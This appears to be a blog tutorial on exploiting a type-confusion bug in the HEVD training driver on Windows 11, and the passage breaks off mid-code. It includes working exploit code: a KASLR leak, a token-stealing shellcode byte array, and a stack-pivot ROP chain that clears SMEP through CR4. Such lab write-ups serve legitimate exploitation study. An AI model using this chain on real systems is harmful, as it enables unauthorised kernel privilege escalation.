How a simple K-TypeConfusion took me 3 months long to create a exploit? [HEVD] - Windows 11 (build 22621)
Have you ever tested something for a really long time, that it made part of your life? that’s what happen to me for the last months when a simple TypeConfusion
vulnerability almost made me go crazy!
Introduction
In this blogpost, we will talk about my experience covering a simple vulnerability that for some reason was the most hard and confuse thing that i ever have seen in a context of Kernel Exploitaiton
.
We will cover about the follow topics:
- TypeConfusion: We will discuss how this vulnerability impact in
windows kernel
, and as a researcher how we can manipulate and implement an exploit fromUser-Land
in order to getPrivileged Access
on the operation system. - ROPchain: Method to make
RIP
register jump through windows kernel addresses, in order toexecute code
. With this technique, we can actually manipulate the order of execution of ourStack
, and thenceforth get access into theUser-Land
Shellcode
. - Kernel ASLR Bypass: Way to
Leak
kernel memory addresses, and with the correct base address, we’re able tocalculate
the memory region which we want to use posteriorly. - Supervisor Mode Execution Prevention (SMEP): Basically a mechanism that block all execution from user-land addresses, if it is enabled in operation system, you can’t
JMP/CALL
intoUser-Land
, so you can’t simply direct execute yourshellcode
. This protection come sinceWindows 8.0 (32/64 bits)
version. - Kernel Memory Managment: Important informations about how Kernel interprets memory, including:
Memory Paging
,Segmentations
,Data Transfer
, etc. Also, a description of how memory uses his data duringOperation System
Layout. - Stack Manipulation: Stack is the most notorious thing that you will see in this blogpost, all my research lies on it, and after reboot my
VM
million times, i actually can understand a little bit some concepts that you must consider when writing aStack Based
exploit.
VM Setup
OS Name: Microsoft Windows 11 Pro
OS Version: 10.0.22621 N/A Build 22621
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Vulnerable Driver: HackSysExtremeVulnerableDriver a.k.a HEVD.sys
Tips for Kernel Exploitation coding
Default windows functions most of the time can delay a exploitation development, because most of these functions should have “protected values” with a view to preveting misuse from attackers or people who want to modify/manipulate
internal values. According many C/C++
scripts, you can find a import as follows:
#include <windows.h>
#include <winternl.h> // Don't use it
#include <iostream>
#pragma comment(lib, "ntdll.lib")
<...snip...>
When a inclusion of winternl.h
file is made, default values of “innumerous” functions are overwritten with the values defined on structs
on the library.
// https://github.com/wine-mirror/wine/blob/master/include/winternl.h#L1790C1-L1798C33
// snippet from wine/include/winternl.h
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemCpuInformation = 1,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3, /* was SystemTimeInformation */
SystemPathInformation = 4,
SystemProcessInformation = 5,
SystemCallCountInformation = 6,
SystemDeviceInformation = 7,
<...snip...>
The problem is, when you manipulating and exploiting functions from User-Land
like NtQuerySystemInformation
in “recent” windows versions, these defined values are “different”, blocking and preveting the use of it functions which can have some ability to leak kernel base addresses
, consequently delaying our exploitation phase. So, it’s import to make sure that a code is crafted by ignoring winternl.h
and posteriorly by utilizing manually structs definitions as example below:
#include <iostream>
#include <windows.h>
#include <ntstatus.h>
#include <string>
#include <Psapi.h>
#include <vector>
#define QWORD uint64_t
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemModuleInformation = 11,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG NumberOfModules;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
// Function pointer typedef for NtDeviceIoControlFile
typedef NTSTATUS(WINAPI* LPFN_NtDeviceIoControlFile)(
HANDLE FileHandle,
HANDLE Event,
PVOID ApcRoutine,
PVOID ApcContext,
PVOID IoStatusBlock,
ULONG IoControlCode,
PVOID InputBuffer,
ULONG InputBufferLength,
PVOID OutputBuffer,
ULONG OutputBufferLength
);
// Loads NTDLL library
HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile function
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));
INT64 GetKernelBase() {
// Leak NTDLL.sys base address in order to KASLR bypass
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}
With this technique, now we’re able to use all correct structs
values without any troubles.
TypeConfusion vulnerability
Utilizing IDA Reverse Engineering Tool
, we can clearly see the correct IOCTL
which execute our vulnerable function.
After reversing TriggerTypeConfusion
, we have the follow code:
// IDA Pseudo-code into TriggerTypeConfusion function
__int64 __fastcall TriggerTypeConfusion(_USER_TYPE_CONFUSION_OBJECT *a1)
{
_KERNEL_TYPE_CONFUSION_OBJECT *PoolWithTag; // r14
unsigned int v4; // ebx
ProbeForRead(a1, 0x10ui64, 1u);
PoolWithTag = (_KERNEL_TYPE_CONFUSION_OBJECT *)ExAllocatePoolWithTag(NonPagedPool, 0x10ui64, 0x6B636148u);
if ( PoolWithTag )
{
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Type: %s\n", "NonPagedPool");
DbgPrintEx(0x4Du, 3u, "[+] Pool Size: 0x%X\n", 16i64);
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] UserTypeConfusionObject: 0x%p\n", a1);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject Size: 0x%X\n", 16i64);
PoolWithTag->ObjectID = a1->ObjectID; // USER_CONTROLLED PARAMETER
PoolWithTag->ObjectType = a1->ObjectType; // USER_CONTROLLED PARAMETER
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectID: 0x%p\n", (const void *)PoolWithTag->ObjectID);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectType: 0x%p\n", PoolWithTag->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Triggering Type Confusion\n");
v4 = TypeConfusionObjectInitializer(PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] Freeing KernelTypeConfusionObject Object\n");
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
ExFreePoolWithTag(PoolWithTag, 0x6B636148u);
return v4;
}
else
{
DbgPrintEx(0x4Du, 3u, "[-] Unable to allocate Pool chunk\n");
return 3221225495i64;
}
}
As you can see, the function is expecting two values from a user-controlled
struct named _KERNEL_TYPE_CONFUSION_OBJECT
, this struct contains (ObjectID, ObjectType)
as parameters, and after parse these objects, it utilizes TypeConfusionObjectInitializer
with our objects. The vulnerable code follows as bellow:
__int64 __fastcall TypeConfusionObjectInitializer(_KERNEL_TYPE_CONFUSION_OBJECT *KernelTypeConfusionObject)
{
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->Callback: 0x%p\n", KernelTypeConfusionObject->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Calling Callback\n");
((void (*)(void))KernelTypeConfusionObject->ObjectType)(); // VULNERABLE
DbgPrintEx(0x4Du, 3u, "[+] Kernel Type Confusion Object Initialized\n");
return 0i64;
}
The vulnerability in the code above is implict behind the unrestricted execution of _KERNEL_TYPE_CONFUSION_OBJECT->ObjectType
which pointer to an user-controlled
address.
Exploit Initialization
Knowing about our vulnerability, now we’ll get focused into exploit phases.
First of all, we craft our code in order to communicate to our HEVD
driver IRP
utilizing previously got IOCTL -> 0x22202
, and after that send our malicious buffer.
<...snip...>
// ---> Malicious Struct <---
typedef struct USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
};
HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));
HANDLE setupSocket() {
// Open a handle to the target device
HANDLE deviceHandle = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
nullptr
);
if (deviceHandle == INVALID_HANDLE_VALUE) {
//std::cout << "[-] Failed to open the device" << std::endl;
FreeLibrary(ntdll);
return FALSE;
}
return deviceHandle;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = 0xDEADBEEFDEADBEEF; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
int main() {
exploit();
return 0;
}
Then after we send our buffer, _KERNEL_TYPE_CONFUSION_OBJECT
should be like this.
Now we can cleary understand where exactly this vulnerability lies. The next step should be to JMP
into our user-controlled
buffer containing some shellcode that can escalate SYSTEM PRIVILEGES
, the issue with this idea lies behind a protection mechanism called SMEP
. Supervisor Mode Execution Prevention
, a.k.a (SMEP)
.
Supervisor Mode Execution Prevention (SMEP)
The main idea behind SMEP
protection is to preveting CALL/JMP
into user-land
addresses. If SMEP
kernel bit
is set to [1]
, it provides a security mechanism that protect
memory pages from user attacks.
According to Core Security,
SMEP: Supervisor Mode Execution Prevention allows pages to
be protected fromsupervisor-mode
instruction fetches. IfSMEP = 1
, software operating in supervisor mode cannot
fetch instructions from linear addresses that are accessible inuser mode
- Detects
RING-0
code running inUSER SPACE
- Introduced atIntel processors
based on theIvy Bridge architecture
- Security feature launched in 2011
- Enabled by default sinceWindows 8.0 (32/64 bits)
- Kernel exploit mitigation
- Specially"Local Privilege Escalation”
exploits
must now consider this feature.
Then let’s see in a pratical test if it is actually working properly.
<...snip...>
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)shellcode; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>
After exploit execution we got something like this:
The BugCheck
analysis should be similar as a follows:
ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory. The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name is printed on
the BugCheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 0000000080000000, Virtual address for the attempted execute.
Arg2: 00000001db4ea867, PTE contents.
Arg3: ffffb40672892490, (reserved)
Arg4: 0000000080000005, (reserved)
<...snip...>
As we can see, SMEP
protection looks working right, the follow steps will cover how do we can manipulate our addresses in order to enable our shellcode buffer to be executed by processor.
Returned-Oriented-Programming against SMEP
Returned-Oriented-Programming
a.k.a (ROP)
, is technique that allows any attacker to manipulate the instruction pointers and returned addresses in the current stack
, with this type of attack, we can actually perform a programming assembly only with execution between address to address.
As CTF101 mentioned:
Return Oriented Programming
(orROP
) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.As we saw in
buffer overflows
, having stack control can be very powerful since it allows us tooverwrite
saved instruction pointers, giving us control over what the program does next. Most programs don’t have a convenientgive_shell
function however, so we need to find a way to manually invokesystem
or anotherexec
function to get us our shell.
The main idea for our exploit lies behind the utilization of a ROP chain
with a view to achieve arbitrary code execution. But how?
x64 CR4 register
As part of a Control Registers
, CR4
register basically holds a bit value that can changes between Operation Systems
.
When SMEP
is implemented, a default value is used in the current OS to check if SMEP
still enabled, and with this information kernel can knows if through his execution, should be possible or not to CALL/JMP
into user-land
addresses.
As Wikipedia says:
A control register is a processor register that changes or controls the general behavior of a
CPU
or other digital device. Common tasks performed by control registers include interrupt control, switching theaddressing mode
,paging control
, andcoprocessor control
.CR4
Used in
protected mode
to control operations such as virtual-8086 support, enablingI/O breakpoints
, page size extension and machine-check exceptions.
In my Operation System Build Windows 11 22621
we can cleary see this register value in WinDBG
:
At now, the main idea is about to flip
the correct bit
, in order to neutralize SMEP
execution, and after that JMP
into attacker shellcode
.
Now, with this in mind, we need get back into our exploit source-code
, and craft our ROP chain
to achieve our goal. The question is, how?
At now, we know that we need change CR4
value and a ROP chain
can help us, also we actually need at first to bypass Kernel ASLR
due the randomization between addresses in this land. The follow steps we’ll cover how to get the correct gadgets
to follow attacks.
Virtualization-based security (VBS)
With CR4
register manipulation through ROP chain
attacks, it’s important to notice that when a miscalculation is done by an attacker in the bit change
exploit phase,if Virtualization-based security
bit is enabled, system catch exception and crashes after a change attempt of CR4
register value.
According to Microsoft:
Virtualization-based security (VBS)
enhancements provide another layer of protection against attempts to execute malicious code in the kernel. For example, Device Guard blocks code execution in a non-signed area in kernel memory, including kernelEoP
code.Enhancements in Device Guard
also protect keyMSRs
, control registers, and descriptor table registers. Unauthorized modifications of theCR4
control register bitfields, including theSMEP
field, are blocked instantly.
If for some reason, you see an error as below, it’s a probably miscalculation of a the value which should be placed into CR4
register.
<...snip...>
// A example of miscalculation of CR4 address
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0xFFFFFF; // ---> WRONG CR4 value
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
WinDBG output:
KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000004, The thread's stack pointer was outside the legal stack
extents for the thread.
Arg2: 0000000047fff230, Address of the trap frame for the exception that caused the BugCheck
Arg3: 0000000047fff188, Address of the exception record for the exception that caused the BugCheck
Arg4: 0000000000000000, Reserved
EXCEPTION_RECORD: 0000000047fff188 -- (.exr 0x47fff188)
ExceptionAddress: fffff80631091b99 (nt!RtlpGetStackLimitsEx+0x0000000000165f29)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000004
Subcode: 0x4 FAST_FAIL_INCORRECT_STACK
PROCESS_NAME: TypeConfusionWin11x64.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system has detected a stack-based buffer overrun in this application. It is possible that this saturation could allow a malicious user to gain control of the application.
EXCEPTION_CODE_STR: c0000409
EXCEPTION_PARAMETER1: 0000000000000004
EXCEPTION_STR: 0xc0000409
KASLR Bypass with NtQuerySystemInformation
NtQuerySystemInformation
As mentioned before, is a function that if configured correctly can leak
kernel lib base addresses
once perform system query operations. As return of these queries, we can actually leak memory from user-land
.
As mentioned by TrustedWave:
The function
NTQuerySystemInformation
is implemented onNTDLL
. And as a kernelAPI
, it is always being updated during the Windows versions with no short notice. As mentioned, this is a private function, so not officially documented by Microsoft. It has been used since early days fromWindows NT-family
systems with different syscallIDs
.
<…snip…>
The function basically retrieves specific information from the environment and its structure is very simple
<…snip…>´
There are numerous data that can be retrieved using these classes along with the function. Information regarding the system, the processes, objects and others.
So, now we have a question, if we can leak
addresses and calculate the correct offset of the base of these addresses to our gadget
, how can we search in memory for these ones?
The solution is simple as follows:
1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt
With the file ROP.txt
, we have addresses but we’re still “unable” to get the correct ones to implement a valid calculation.
Ntdll
for exemple, utilizes addresses from his module as “buffers” sometimes, and the data can point for another invalid one. At kernel level, functions “changes”, and between all these “changes” you will never hit the correct offset through a simple .writemem
dump.
The biggest issue lies behind when a .writemem
is used, it dumps the start and end of a defined module, but it automatically don’t align correctly the offset of functions. It happens due module segments
and malleable data
which can change time by time for the properly OS work . For example, if we search for opcodes
utilizing WinDBG
command line, there’s a static buffer address which returns exatcly the opcodes
that we send.
The addresses above seems to be valid, and they are identical due our opcodes
, the problem is that 0xffffff80051ef8500
is a buffer and it returns everything we put into WinDBG
search function [s command]
. So, no matter how you changesopcode
, it always returns back in a buffer.
Ok, now let’s say that ROPGadget.py
return as the follow output:
--> 0xfffff800516a6ac4 : pop r12 ; pop rbx ; pop rbp ; pop rdi ; pop rsi ; ret
0xfffff800514cbd9a : pop r12 ; pop rbx ; pop rbp ; ret
0xfffff800514d2bbf : pop r12 ; pop rbx ; ret
0xfffff800514b2793 : pop r12 ; pop rcx ; ret
If we try to check if that opcodes
are the same in our current VM, we’ll notice something like this:
As you can see, the offset from .writemem
is invalid, meaning that something went wrong. A simple fix for this issue is by looking into our ROPGadgets
and see what assembly code that we need, and thenceforth we convert this code into opcode
, so with that we can freely search into current valid memory the addresses to start our ROP chain
.
4 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
5 - kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
6 - kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
7 - kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0
Now we know that ntdll base address 0xffffff8005120000 + 0x00000000002ce4c0
will result into nt!ExfReleasePushLock+0x20
function.
Stack Pivoting & ROP chain
With previously idea of what exatcly means aROP chain
, now it’s important to know what gadget do we need to change CR4
register value utlizing only kernel addresses.
STACK PIVOTING:
mov esp, 0x48000000
ROP CHAIN:
POP RCX; ret // Just "pop" our RCX register to receive values
<CR4 CALCULATED VALUE> // Calculated value of current OS CR4 value
MOV CR4, RCX; ret // Changes current CR4 value with a manipulated one
// The logic for the ROP chain
// 1 - Allocate memory in 0x48000000 region
// 2 - When we moves 0x48000000 address to our ESP/RSP register
we actually can manipulated the range of addresses that we'll [CALL/JMP].
Now knowing about ourROP chain
logic, we need to discuss about Stack Pivoting
technique.
Stack pivoting
basically means the changes of current Kernel stack into a user-controlled Fake Stack
, this modification can be possible by changing RSP
register value. When we changes RSP
value to a user-controlled
stack, we can actually manipulate it execution through a ROP chain
, once we can do a programming returning into kernel addresses.
Getting back into the code, we implement our attacker Fake Stack
.
<...snip...>
typedef struct USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
};
typedef struct _SMEP {
INT64 STACK_PIVOT;
INT64 POP_RCX;
INT64 MOV_CR4_RCX;
} SMEP;
<...snip...>
// Leak base address utilizing NtQuerySystemInformation
INT64 GetKernelBase() {
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}
SMEP SMEPBypass = { 0 };
int SMEPBypassInitializer() {
INT64 NT_BASE_ADDR = GetKernelBase(); // ntoskrnl.exe
std::cout << std::endl << "[+] NT_BASE_ADDR: 0x" << std::hex << NT_BASE_ADDR << std::endl;
INT64 STACK_PIVOT = NT_BASE_ADDR + 0x002ce4c0;
SMEPBypass.STACK_PIVOT = STACK_PIVOT;
std::cout << "[+] STACK_PIVOT: 0x" << std::hex << STACK_PIVOT << std::endl;
/*
1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt
*******************************************************************************
kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0
*/
INT64 POP_RCX = NT_BASE_ADDR + 0x0021d795;
SMEPBypass.POP_RCX = POP_RCX;
std::cout << "[+] POP_RCX: 0x" << std::hex << POP_RCX << std::endl;
/*
kd> s fffff800`51200000 L?01047000 41 5C 59 C3
fffff800`5141d793 41 5c 59 c3 cc b1 02 e8-21 06 06 00 eb c1 cc cc A\Y.....!.......
fffff800`5141f128 41 5c 59 c3 cc cc cc cc-cc cc cc cc cc cc cc cc A\Y.............
fffff800`5155a604 41 5c 59 c3 cc cc cc cc-cc cc cc cc 48 8b c4 48 A\Y.........H..H
kd> u fffff800`5141d795
nt!KeClockInterruptNotify+0x2ff5:
fffff800`5141d795 59 pop rcx
fffff800`5141d796 c3 ret
kd> ? fffff800`5141d795 - fffff800`51200000
Evaluate expression: 2217877 = 00000000`0021d795
*/
INT64 MOV_CR4_RDX = NT_BASE_ADDR + 0x003a5fc7;
SMEPBypass.MOV_CR4_RCX = MOV_CR4_RDX;
std::cout << "[+] MOV_CR4_RDX: 0x" << std::hex << POP_RCX << std::endl << std::endl;
/*
kd> u nt!KeFlushCurrentTbImmediately+0x17
nt!KeFlushCurrentTbImmediately+0x17:
fffff800`515a5fc7 0f22e1 mov cr4,rcx
fffff800`515a5fca c3 ret
kd> ? fffff800`515a5fc7 - fffff800`51200000
Evaluate expression: 3825607 = 00000000`003a5fc7
*/
return TRUE;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
